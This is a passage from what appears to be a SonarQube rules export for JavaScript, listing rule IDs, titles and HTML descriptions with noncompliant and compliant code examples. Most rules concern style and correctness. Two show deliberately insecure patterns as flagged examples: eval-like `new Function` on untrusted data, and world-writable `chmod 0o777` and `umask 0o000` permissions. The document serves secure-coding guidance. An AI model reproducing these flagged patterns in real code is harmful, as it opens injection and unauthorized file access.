&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
if (condition) {                                   //Compliant
  doSomething();
} else {                                           //Compliant
  doSomethingElse();
}
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; Object literals appearing as arguments can start on their own line. &lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;
functionWithObject(
   {                                                 //Compliant
        g: "someValue"
   }
);
&lt;/pre&gt;
&lt;ul&gt;
  &lt;li&gt; When blocks are inlined (left and right curly braces on the same line), no issue is triggered. &lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;
if(condition) {doSomething();}                       //Compliant
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1226</t>
  </si>
  <si>
    <t>Function parameters, caught exceptions and foreach variables' initial values should not be ignored</t>
  </si>
  <si>
    <t>&lt;p&gt;While it is technically correct to assign to parameters from within function bodies, it reduces code readability because developers wonâ€™t be able
to tell whether the original parameter or some temporary variable is being accessed without going through the whole function. Moreover, some
developers might also expect assignments of function parameters to be visible to callers, which is not the case, and this lack of visibility could
confuse them. Instead, all parameters, caught exceptions, and foreach parameters should be treated as constants.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function MyClass(name, strings) {
  name = foo;                    // Noncompliant
  for (var str of strings) {
    str = "";  // Noncompliant
  }
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3525</t>
  </si>
  <si>
    <t>Class methods should be used instead of "prototype" assignments</t>
  </si>
  <si>
    <t>&lt;p&gt;Originally JavaScript didnâ€™t support &lt;code&gt;class&lt;/code&gt;es, and class-like behavior had to be kludged using things like &lt;code&gt;prototype&lt;/code&gt;
assignments for "class" functions. Fortunately, ECMAScript 2015 added classes, so any lingering &lt;code&gt;prototype&lt;/code&gt; uses should be converted to
true &lt;code&gt;class&lt;/code&gt;es. The new syntax is more expressive and clearer, especially to those with experience in other languages.&lt;/p&gt;
&lt;p&gt;Specifically, with ES2015, you should simply declare a &lt;code&gt;class&lt;/code&gt; and define its methods inside the class declaration.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function MyNonClass(initializerArgs = []) {
  this._values = [...initializerArgs];
}
MyNonClass.prototype.doSomething = function () {  // Noncompliant
  // ...
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
class MyClass {
  constructor(initializerArgs = []) {
    this._values = [...initializerArgs];
  }
  doSomething() {
    //...
  }
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S4619</t>
  </si>
  <si>
    <t>"in" should not be used on arrays</t>
  </si>
  <si>
    <t>&lt;p&gt;The &lt;code&gt;in&lt;/code&gt; operator used on an array is valid but the code will likely not have the expected behavior. The &lt;code&gt;in&lt;/code&gt; operator deals
with the indexes of the array, not with the values.&lt;/p&gt;
&lt;p&gt;If checking for an array slot is indeed desired, using &lt;code&gt;hasOwnProperty&lt;/code&gt; makes the code intention clearer.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function func1() {
    let arr = ["a", "b", "c"];
    let expectedValue = "b";
    if (expectedValue in arr) { // Noncompliant, will be always false
        return expectedValue + " found in the array";
    } else {
        return expectedValue + " not found";
    }
}
function func2() {
    let arr = ["a", "b", "c"];
    let expectedValue = "1"; // index #1 is corresponding to the value "b"
    if (expectedValue in arr) { // Noncompliant, will be always true because the array is made of 3 elements and the #1 is always there whatever its value
        return expectedValue + " found in the array";
    } else {
        return expectedValue + " not found";
    }
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function func() {
    let arr = ["a", "b", "c"];
    let expectedValue = "b";
    if (arr.includes(expectedValue)) {
        return expectedValue + " was found in the array";
    } else {
        return expectedValue + " not found";
    }
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3523</t>
  </si>
  <si>
    <t>Function constructors should not be used</t>
  </si>
  <si>
    <t>&lt;p&gt;In addition to being obtuse from a syntax perspective, function constructors are also dangerous: their execution evaluates the constructorâ€™s string
arguments similar to the way &lt;code&gt;eval&lt;/code&gt; works, which could expose your program to random, unintended code which can be both slow and a security
risk.&lt;/p&gt;
&lt;p&gt;In general it is better to avoid it altogether, particularly when used to parse JSON data. You should use ECMAScript 5â€™s built-in JSON functions or
a dedicated library.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var obj =  new Function("return " + data)();  // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var obj = JSON.parse(data);
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;Function calls where the argument is a string literal (e.g. &lt;code&gt;(Function('return this'))()&lt;/code&gt;) are ignored.&lt;/p&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; OWASP Top 10 2017 Category A1 - Injection &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Deprecated&lt;/h2&gt;
&lt;p&gt;This rule is deprecated; use {rule:javascript:S1523} instead.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S3402</t>
  </si>
  <si>
    <t>Strings and non-strings should not be added</t>
  </si>
  <si>
    <t>&lt;p&gt;Use a &lt;code&gt;+&lt;/code&gt; with two numbers and youâ€™ll get addition. But use it with a string and anything else, and youâ€™ll get concatenation. This could
be confusing, especially if itâ€™s not obvious that one of the operands is a string. It is recommended to explicitly convert the non-string component to
make it easier to understand to future maintainers.&lt;/p&gt;
&lt;p&gt;This rule raises an issue when &lt;code&gt;+&lt;/code&gt; is used with a string and a non-string.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function foo() {
  let x = 5 + 8;  // okay
  let z = "8"
  return x + z;  // Noncompliant; yields string "138"
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function foo() {
  let x = 5 + 8;
  let z = "8"
  return x + Number(z);
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S4165</t>
  </si>
  <si>
    <t>Assignments should not be redundant</t>
  </si>
  <si>
    <t>&lt;p&gt;The transitive property says that if &lt;code&gt;a == b&lt;/code&gt; and &lt;code&gt;b == c&lt;/code&gt;, then &lt;code&gt;a == c&lt;/code&gt;. In such cases, thereâ€™s no point in
assigning &lt;code&gt;a&lt;/code&gt; to &lt;code&gt;c&lt;/code&gt; or vice versa because theyâ€™re already equivalent.&lt;/p&gt;
&lt;p&gt;This rule raises an issue when an assignment is useless because the assigned-to variable already holds the value on all execution paths.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
a = b;
c = a;
b = c; // Noncompliant: c and b are already the same
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
a = b;
c = a;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S4043</t>
  </si>
  <si>
    <t>Array-mutating methods should not be used misleadingly</t>
  </si>
  <si>
    <t>&lt;p&gt;Many of JavaScriptâ€™s &lt;code&gt;Array&lt;/code&gt; methods return an altered version of the array while leaving the source array intact. &lt;code&gt;reverse&lt;/code&gt;
and &lt;code&gt;sort&lt;/code&gt; do not fall into this category. Instead, they alter the source array &lt;em&gt;in addition to&lt;/em&gt; returning the altered version,
which is likely not what was intended.&lt;/p&gt;
&lt;p&gt;This rule raises an issue when the return values of these methods are assigned, which could lead maintainers to overlook the fact that the original
value is altered.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var b = a.reverse(); // Noncompliant
var d = c.sort(); // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var b = [...a].reverse();  // de-structure and create a new array, so reverse doesn't impact 'a'
a.reverse();
c.sort(); // this sorts array in place
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3514</t>
  </si>
  <si>
    <t>Destructuring syntax should be used for assignments</t>
  </si>
  <si>
    <t>&lt;p&gt;ECMAScript 2015 introduced the ability to extract and assign multiple data points from an object or array simultaneously. This is called
"destructuring", and it allows you to condense boilerplate code so you can concentrate on logic.&lt;/p&gt;
&lt;p&gt;This rule raises an issue when multiple pieces of data are extracted out of the same object or array and assigned to variables.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function foo (obj1, obj2, array) {
  var a = obj1.a;  // Noncompliant
  var b = obj1.b;
  var name = obj2.name;  // ignored; there's only one extraction-and-assignment
  var zero = array[0];  // Noncompliant
  var one = array[1];
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function foo (obj1, obj2, array) {
  var {a, b} = obj1;
  var {name} = obj2;  // this syntax works because var name and property name are the same
  var [zero, one] = array;
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2428</t>
  </si>
  <si>
    <t>Object literal syntax should be used</t>
  </si>
  <si>
    <t>&lt;p&gt;Object literal syntax, which initializes an objectâ€™s properties inside the object declaration is cleaner and clearer than the alternative: creating
an empty object, and then giving it properties one by one.&lt;/p&gt;
&lt;p&gt;An issue is raised when the following pattern is met:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; An empty object is created. &lt;/li&gt;
  &lt;li&gt; A consecutive single-line statement adds a property to the created object. &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
let person = {};  // Noncompliant
person.firstName = "John";
person.middleInitial = "Q";
person.lastName = "Public";
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
let person = {
  firstName: "John",
  middleInitial: "Q",
  lastName: "Public",
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3516</t>
  </si>
  <si>
    <t>Function returns should not be invariant</t>
  </si>
  <si>
    <t>&lt;p&gt;When a function is designed to return an invariant value, it may be poor design, but it shouldnâ€™t adversely affect the outcome of your program.
However, when it happens on all paths through the logic, it is likely a mistake.&lt;/p&gt;
&lt;p&gt;This rule raises an issue when a function contains several &lt;code&gt;return&lt;/code&gt; statements that all return the same value.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function foo(a) {  // Noncompliant
  let b = 12;
  if (a) {
    return b;
  }
  return b;
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2427</t>
  </si>
  <si>
    <t>The base should be provided to "parseInt"</t>
  </si>
  <si>
    <t>&lt;p&gt;The &lt;code&gt;parseInt&lt;/code&gt; function has two versions, one that takes a base value as a second argument, and one that does not. Unfortunately using
the single-arg version can result in unexpected results on older browsers.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
parseInt("010");  // Noncompliant; pre-2013 browsers may return 8
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
parseInt("010", 10);
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1451</t>
  </si>
  <si>
    <t>Track lack of copyright and license headers</t>
  </si>
  <si>
    <t>&lt;p&gt;Each source file should start with a header stating file ownership and the license which must be used to distribute the application.&lt;/p&gt;
&lt;p&gt;This rule must be fed with the header text that is expected at the beginning of every file.&lt;/p&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
/*
 * SonarQube, open source software quality management tool.
 * Copyright (C) 2008-2013 SonarSource
 * mailto:contact AT sonarsource DOT com
 *
 * SonarQube is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 3 of the License, or (at your option) any later version.
 *
 * SonarQube is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public License
 * along with this program; if not, write to the Free Software Foundation,
 * Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
 */
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3513</t>
  </si>
  <si>
    <t>"arguments" should not be accessed directly</t>
  </si>
  <si>
    <t>&lt;p&gt;The magic of JavaScript is that you can pass arguments to functions that donâ€™t declare parameters, and on the other side, you can use those
passed-in arguments inside the no-args &lt;code&gt;function&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;But just because you can, that doesâ€™t mean you should. The expectation and use of arguments inside functions that donâ€™t explicitly declare them is
confusing to callers. No one should ever have to read and fully understand a function to be able to use it competently.&lt;/p&gt;
&lt;p&gt;If you donâ€™t want to name arguments explicitly, use the &lt;code&gt;...&lt;/code&gt; syntax to specify that an a variable number of arguments is expected. Then
inside the function, youâ€™ll be dealing with a first-class array, rather than an array-like structure.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function concatenate() {
  let args = Array.prototype.slice.call(arguments);  // Noncompliant
  return args.join(', ');
}
function doSomething(isTrue) {
  var args = Array.prototype.slice.call(arguments, 1); // Noncompliant
  if (!isTrue) {
    for (var arg of args) {
      ...
    }
  }
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function concatenate(...args) {
  return args.join(', ');
}
function doSomething(isTrue, ...values) {
  if (!isTrue) {
    for (var value of values) {
      ...
    }
  }
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S6092</t>
  </si>
  <si>
    <t>Chai assertions should have only one reason to succeed</t>
  </si>
  <si>
    <t>&lt;p&gt;Each assertion should test one condition and have only one reason to fail or succeed. If an assertion success depends on multiple conditions it
becomes difficult to understand if the test passed for the right reason. It also makes debugging more difficult when the test fails.&lt;/p&gt;
&lt;p&gt;This rule raises an issue when the following Chai assertions are found:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; When &lt;code&gt;.not&lt;/code&gt; and &lt;a href="https://www.chaijs.com/api/bdd/#method_throw"&gt;&lt;code&gt;.throw&lt;/code&gt;&lt;/a&gt; are used together and at least one
  argument is provided to &lt;code&gt;.throw&lt;/code&gt;. Such assertions succeed when the target either does not throw any exception, or when it throws an
  exception different from the one provided. &lt;/li&gt;
  &lt;li&gt; When &lt;code&gt;.not&lt;/code&gt; and &lt;a href="https://www.chaijs.com/api/bdd/#method_include"&gt;&lt;code&gt;.include&lt;/code&gt;&lt;/a&gt; are used together and an
  &lt;code&gt;object&lt;/code&gt; is given to &lt;code&gt;.include&lt;/code&gt;. Such assertions succeed when one or multiple key/values are missing. &lt;/li&gt;
  &lt;li&gt; When &lt;code&gt;.not&lt;/code&gt; and &lt;a href="https://www.chaijs.com/api/bdd/#method_property"&gt;&lt;code&gt;.property&lt;/code&gt;&lt;/a&gt; are used together and
  &lt;code&gt;.property&lt;/code&gt; is given at least two arguments. Such assertions succeed when the target either doesnâ€™t have the requested property, or when
  this property exists but has a different value. &lt;/li&gt;
  &lt;li&gt; When &lt;code&gt;.not&lt;/code&gt; and &lt;a href="https://www.chaijs.com/api/bdd/#method_ownpropertydescriptor"&gt;&lt;code&gt;.ownPropertyDescriptor&lt;/code&gt;&lt;/a&gt; are
  used together and &lt;code&gt;.ownPropertyDescriptor&lt;/code&gt; is given at least two arguments. Such assertions succeed when the target either doesnâ€™t have
  the requested property descriptor, or its property descriptor is not deeply equal to the given descriptor &lt;/li&gt;
  &lt;li&gt; When &lt;code&gt;.not&lt;/code&gt; and &lt;a href="https://www.chaijs.com/api/bdd/#method_members"&gt;&lt;code&gt;.members&lt;/code&gt;&lt;/a&gt; are used together. Such
  assertions succeed when one or multiple members are missing. &lt;/li&gt;
  &lt;li&gt; When &lt;a href="https://www.chaijs.com/api/bdd/#method_change"&gt;&lt;code&gt;.change&lt;/code&gt;&lt;/a&gt; and &lt;a
  href="https://www.chaijs.com/api/bdd/#method_by"&gt;&lt;code&gt;.by&lt;/code&gt;&lt;/a&gt; are used together. Such assertions succeed when the target either decreases or
  increases by the given delta &lt;/li&gt;
  &lt;li&gt; When &lt;code&gt;.not&lt;/code&gt; and &lt;a href="https://www.chaijs.com/api/bdd/#method_increase"&gt;&lt;code&gt;.increase&lt;/code&gt;&lt;/a&gt; are used together. Such
  assertions succeed when the target either decreases or stays the same. &lt;/li&gt;
  &lt;li&gt; When &lt;code&gt;.not&lt;/code&gt; and &lt;a href="https://www.chaijs.com/api/bdd/#method_decrease"&gt;&lt;code&gt;.decrease&lt;/code&gt;&lt;/a&gt; are used together. Such
  assertions succeed when the target either increases or stays the same. &lt;/li&gt;
  &lt;li&gt; When &lt;code&gt;.not&lt;/code&gt; negates &lt;a href="https://www.chaijs.com/api/bdd/#method_decrease"&gt;&lt;code&gt;.by&lt;/code&gt;&lt;/a&gt;. Such assertions succeed when the
  target didnâ€™t change by one specific delta among all the possible deltas. &lt;/li&gt;
  &lt;li&gt; When &lt;code&gt;.not&lt;/code&gt; and &lt;a href="https://www.chaijs.com/api/bdd/#method_decrease"&gt;&lt;code&gt;.finite&lt;/code&gt;&lt;/a&gt; are used together. Such
  assertions succeed when the target either is not a &lt;code&gt;number&lt;/code&gt;, or is one of &lt;code&gt;Nan&lt;/code&gt;, positive &lt;code&gt;Infinity&lt;/code&gt;, negative
  &lt;code&gt;Infinity&lt;/code&gt;. &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
const expect = require('chai').expect;
describe("uncertain assertions", function() {
    const throwsTypeError = () =&amp;gt; { throw new TypeError() }
    it("uses chai 'expect'", function() {
        expect(throwsTypeError).to.not.throw(ReferenceError) // Noncompliant
        expect({a: 42}).to.not.include({b: 10, c: 20});  // Noncompliant
        expect({a: 21}).to.not.have.property('b', 42); // Noncompliant
        expect({a: 21}).to.not.have.ownPropertyDescriptor('b', {   // Noncompliant
            configurable: true,
            enumerable: true,
            writable: true,
            value: 42,
        });
        expect([21, 42]).to.not.have.members([1, 2]); // Noncompliant
        var myObj = { value: 1 }
        const incThree = () =&amp;gt; { myObj.value += 3; };
        const decThree = () =&amp;gt; { myObj.value -= 3; };
        const doNothing = () =&amp;gt; {};
        expect(incThree).to.change(myObj, 'value').by(3); // Noncompliant
        expect(decThree).to.change(myObj, 'value').by(3); // Noncompliant
        expect(decThree).to.not.increase(myObj, 'value'); // Noncompliant
        expect(incThree).to.not.decrease(myObj, 'value'); // Noncompliant
        expect(doNothing).to.not.increase(myObj, 'value'); // Noncompliant
        expect(doNothing).to.not.decrease(myObj, 'value'); // Noncompliant
        expect(incThree).to.increase(myObj, 'value').but.not.by(1); // Noncompliant
        let toCheck;
        expect(toCheck).to.not.be.finite; // Noncompliant
    });
});
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
const expect = require('chai').expect;
describe("uncertain assertions", function() {
    const throwsTypeError = () =&amp;gt; { throw new TypeError() }
    it("uses chai 'expect'", function() {
        expect(throwsTypeError).to.throw(TypeError)
        expect({a: 42}).to.not.have.any.keys('b', 'c');
        expect({a: 21}).to.not.have.property('b');
        expect({a: 21}).to.not.have.ownPropertyDescriptor('b');
        expect([21, 42]).to.not.include(1).and.not.include(2);
        var myObj = { value: 1 }
        const incThree = () =&amp;gt; { myObj.value += 3; };
        const decThree = () =&amp;gt; { myObj.value -= 3; };
        const doNothing = () =&amp;gt; {};
        expect(incThree).to.increase(myObj, 'value').by(3);
        expect(decThree).to.decrease(myObj, 'value').by(3);
        expect(decThree).to.decrease(myObj, 'value').by(3);
        expect(incThree).to.increase(myObj, 'value').by(3);
        expect(doNothing).to.not.change(myObj, 'value');
        expect(incThree).to.increase(myObj, 'value').by(3);
        let toCheck;
        // Either of the following is valid
        expect(toCheck).to.be.a('string');
        expect(toCheck).to.be.NaN;
        expect(toCheck).to.equal(Infinity);
        expect(toCheck).to.equal(-Infinity);
    });
});
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2612</t>
  </si>
  <si>
    <t>Setting loose POSIX file permissions is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;In Unix, "&lt;code&gt;others&lt;/code&gt;" class refers to all users except the owner of the file and the members of the group assigned to this file.&lt;/p&gt;
&lt;p&gt;Granting permissions to this group can lead to unintended access to files.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; The application is designed to be run on a multi-user environment. &lt;/li&gt;
  &lt;li&gt; Corresponding files and directories may contain confidential information. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;p&gt;The most restrictive possible permissions should be assigned to files and directories.&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;p&gt;Node.js &lt;a href="https://nodejs.org/api/fs.html"&gt;&lt;code&gt;fs&lt;/code&gt;&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;
const fs = require('fs');
fs.chmodSync("/tmp/fs", 0o777); // Sensitive
&lt;/pre&gt;
&lt;pre&gt;
const fs = require('fs');
const fsPromises = fs.promises;
fsPromises.chmod("/tmp/fsPromises", 0o777); // Sensitive
&lt;/pre&gt;
&lt;pre&gt;
const fs = require('fs');
const fsPromises = fs.promises
async function fileHandler() {
  let filehandle;
  try {
    filehandle = fsPromises.open('/tmp/fsPromises', 'r');
    filehandle.chmod(0o777); // Sensitive
  } finally {
    if (filehandle !== undefined)
      filehandle.close();
  }
}
&lt;/pre&gt;
&lt;p&gt;Node.js &lt;a href="https://nodejs.org/api/process.html#process_process_umask_mask"&gt;&lt;code&gt;process.umask&lt;/code&gt;&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;
const process = require('process');
process.umask(0o000); // Sensitive
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;Node.js &lt;a href="https://nodejs.org/api/fs.html"&gt;&lt;code&gt;fs&lt;/code&gt;&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;
const fs = require('fs');
fs.chmodSync("/tmp/fs", 0o770); // Compliant
&lt;/pre&gt;
&lt;pre&gt;
const fs = require('fs');
const fsPromises = fs.promises;
fsPromises.chmod("/tmp/fsPromises", 0o770); // Compliant
&lt;/pre&gt;
&lt;pre&gt;
const fs = require('fs');
const fsPromises = fs.promises
async function fileHandler() {
  let filehandle;
  try {
    filehandle = fsPromises.open('/tmp/fsPromises', 'r');
    filehandle.chmod(0o770); // Compliant
  } finally {
    if (filehandle !== undefined)
      filehandle.close();
  }
}
&lt;/pre&gt;
&lt;p&gt;Node.js &lt;a href="https://nodejs.org/api/process.html#process_process_umask_mask"&gt;&lt;code&gt;process.umask&lt;/code&gt;&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;
const process = require('process');
process.umask(0o007); // Compliant
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control"&gt;OWASP Top 10 2017 Category A5&lt;/a&gt; - Broken Access Control &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Test_File_Permission_(OTG-CONFIG-009)"&gt;OWASP File Permission&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/732"&gt;MITRE, CWE-732&lt;/a&gt; - Incorrect Permission Assignment for Critical Resource &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/266.html"&gt;MITRE, CWE-266&lt;/a&gt; - Incorrect Privilege Assignment &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat3"&gt;SANS Top 25&lt;/a&gt; - Porous Defenses &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S3827</t>
  </si>
  <si>
    <t>Variables should be defined before being used</t>
  </si>
  <si>
    <t>&lt;p&gt;When a non-existent variable is referenced a &lt;code&gt;ReferenceError&lt;/code&gt; is raised.&lt;/p&gt;
&lt;p&gt;Due to the dynamic nature of JavaScript this can happen in a number of scenarios:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; When typo was made in a symbolâ€™s name. &lt;/li&gt;
  &lt;li&gt; When using variable declared with &lt;code&gt;let&lt;/code&gt; or &lt;code&gt;const&lt;/code&gt; before declaration (unlike &lt;code&gt;var&lt;/code&gt;-declarations, they are not
  hoisted to the top of the scope). &lt;/li&gt;
  &lt;li&gt; Due to confusion with scopes of &lt;code&gt;let&lt;/code&gt;- and &lt;code&gt;const&lt;/code&gt;-declarations (they have block scope, unlike
  &lt;code&gt;var&lt;/code&gt;-declarations, having function scope). &lt;/li&gt;
  &lt;li&gt; When accessing a property in the wrong scope (e.g. forgetting to specify &lt;code&gt;this.&lt;/code&gt;). &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This rule does not raise issues on global variables which are defined with &lt;code&gt;sonar.javascript.globals&lt;/code&gt; and
&lt;code&gt;sonar.javascript.environments&lt;/code&gt; properties.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var john = {
  firstName: "john",
  show: function() { console.log(firstName); } // Noncompliant: firstName is not defined
}
john.show();
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var john = {
  firstName: "john",
  show: function() { console.log(this.firstName); }
}
john.show();
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2737</t>
  </si>
  <si>
    <t>"catch" clauses should do more than rethrow</t>
  </si>
  <si>
    <t>&lt;p&gt;A &lt;code&gt;catch&lt;/code&gt; clause that only rethrows the caught exception has the same effect as omitting the &lt;code&gt;catch&lt;/code&gt; altogether and letting
it bubble up automatically, but with more code and the additional detriment of leaving maintainers scratching their heads.&lt;/p&gt;
&lt;p&gt;Such clauses should either be eliminated or populated with the appropriate logic.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
try {
  doSomething();
} catch (ex) {  // Noncompliant
  throw ex;
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
try {
  doSomething();
} catch (ex) {
  console.err(ex);
  throw ex;
}
&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre&gt;
doSomething();
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1529</t>
  </si>
  <si>
    <t>Bitwise operators should not be used in boolean contexts</t>
  </si>
  <si>
    <t>&lt;p&gt;The bitwise operators &lt;code&gt;&amp;amp;&lt;/code&gt;, &lt;code&gt;|&lt;/code&gt; can be mistaken for the boolean operators &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; and &lt;code&gt;||&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;This rule raises an issue when &lt;code&gt;&amp;amp;&lt;/code&gt; or &lt;code&gt;|&lt;/code&gt; is used in a boolean context.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
if (a &amp;amp; b) { ... } // Noncompliant; &amp;amp; used in error
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
if (a &amp;amp;&amp;amp; b) { ... }
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;When a file contains other bitwise operations, (&lt;code&gt;^&lt;/code&gt;, &lt;code&gt;&amp;lt;&amp;lt;&lt;/code&gt;, &lt;code&gt;&amp;gt;&amp;gt;&amp;gt;&lt;/code&gt;, &lt;code&gt;&amp;gt;&amp;gt;&lt;/code&gt;,
&lt;code&gt;~&lt;/code&gt;, &lt;code&gt;&amp;amp;=&lt;/code&gt;, &lt;code&gt;^=&lt;/code&gt;, &lt;code&gt;|=&lt;/code&gt;, &lt;code&gt;&amp;lt;&amp;lt;=&lt;/code&gt;, &lt;code&gt;&amp;gt;&amp;gt;=&lt;/code&gt;, &lt;code&gt;&amp;gt;&amp;gt;&amp;gt;=&lt;/code&gt; and
&lt;code&gt;&amp;amp;&lt;/code&gt; or &lt;code&gt;|&lt;/code&gt; used with a numeric literal as the right operand) all issues in the file are ignored, because it is evidence that
bitwise operations are truly intended in the file.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S2970</t>
  </si>
  <si>
    <t>Assertions should be complete</t>
  </si>
  <si>
    <t>&lt;p&gt;It is very easy to write incomplete assertions when using some test frameworks. This rule enforces complete Chai assertions in the following
cases:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; when &lt;code&gt;assert.fail&lt;/code&gt;, &lt;code&gt;expect.fail&lt;/code&gt; or &lt;code&gt;should.fail&lt;/code&gt; are present but not called. &lt;/li&gt;
  &lt;li&gt; when an &lt;code&gt;expect(...)&lt;/code&gt; or &lt;code&gt;should&lt;/code&gt; assertion is not followed by an assertion method, such as &lt;code&gt;equal&lt;/code&gt;. &lt;/li&gt;
